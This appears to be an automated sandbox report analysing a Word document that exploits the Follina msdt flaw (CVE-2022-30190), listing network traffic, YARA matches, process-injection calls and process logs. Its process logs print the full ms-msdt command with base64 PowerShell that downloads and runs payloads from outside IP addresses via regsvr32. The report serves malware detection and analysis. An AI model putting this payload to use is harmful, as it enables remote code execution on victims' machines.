Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://invites.office.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://lifecycle.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://login.windows.local
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://management.azure.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://management.azure.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://messaging.engagement.office.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://messaging.office.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://ncus.contentsync.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://officeapps.live.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://onedrive.live.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://osi.office.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://otelrules.azureedge.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://outlook.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://outlook.office.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://outlook.office365.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://outlook.office365.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://powerlift.acompli.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://roaming.edog.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://settings.outlook.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://staging.cortana.ai
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://tasks.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://webshell.suite.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://wus2.contentsync.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1240405476.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 185.234.247.119Connection: Keep-Alive
Yara signature match
Source: 00000013.00000002.807689748.0000000003340000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000013.00000002.807640335.0000000003050000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000013.00000002.805909900.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 00000013.00000002.806003549.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: Process Memory Space: msdt.exe PID: 6148, type: MEMORYSTR Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm, type: DROPPED Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, type: DROPPED Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm, type: DROPPED Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Detected potential crypto function
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008C358D 24_2_008C358D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008C2988 24_2_008C2988
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008C8240 24_2_008C8240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008C670F 24_2_008C670F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008C6350 24_2_008C6350
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049C358D 38_2_049C358D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049C2988 38_2_049C2988
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049C8240 38_2_049C8240
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049C670F 38_2_049C670F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049C6350 38_2_049C6350
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AB2988 39_2_04AB2988
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AB358D 39_2_04AB358D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AB8240 39_2_04AB8240
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AB670F 39_2_04AB670F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AB6350 39_2_04AB6350
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_04822988 40_2_04822988
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0482358D 40_2_0482358D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_04828240 40_2_04828240
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0482670F 40_2_0482670F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_04826350 40_2_04826350
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049BD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose, 38_2_049BD447
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049BD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 38_2_049BD959
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AAD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose, 39_2_04AAD447
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AAD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 39_2_04AAD959
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0481D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose, 40_2_0481D447
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0481D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 40_2_0481D959
PE file does not import any functions
Source: DiagPackage.dll.19.dr Static PE information: No import functions for PE file found
Source: DiagPackage.dll.mui.19.dr Static PE information: No import functions for PE file found
PE file contains strange resources
Source: DiagPackage.dll.19.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.19.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.19.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: jr3.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: jr3.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: jr3.dll
Spawns drivers
Source: unknown Driver loaded: C:\Windows\System32\drivers\udfs.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "E:\doc276.docx" /o "
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img" Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
